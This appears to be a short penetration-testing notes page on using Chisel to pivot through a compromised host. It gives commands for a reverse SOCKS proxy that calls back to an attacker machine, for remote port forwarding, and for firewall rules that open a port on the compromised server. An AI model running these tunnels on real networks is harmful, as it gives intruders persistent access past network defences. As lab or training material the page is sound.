Chisel

Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server.

Reverse SOCKS Proxy

First we need to set up the chisel server on our attacking machine

pingchisel server -p 1335 --reverse &

Next set up the client on the compromised server

./chisel client 10.50.102.164:1335 R:socks &

R:socks
- R means remotes. This tells chisel that the server is waiting for a proxy or port forward to be made

The connection will be made on port 1335 but the actual proxy is opened on port 1080. So we will be using 1080 to send traffic through the proxy.

Remote Port Forward

A remote port forward is when we connect back from a compromised target to create the forward.

Start the chisel server on the compromised host (you will also have to open up the firewall port)

./chisel_windows.exe server -p 15997 --socks5

netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997

firewall-cmd --zone=public --add-port 15997/tcp

Connect to the chisel server

chisel client 10.200.101.150:15997 5005:socks

For a local port forward it would be exactly the same except the compromised server becomes the chisel server and your attacking machine becomes the chisel client

PreviousSocat NextSSHuttle

Last updated 11 months ago

Was this helpful?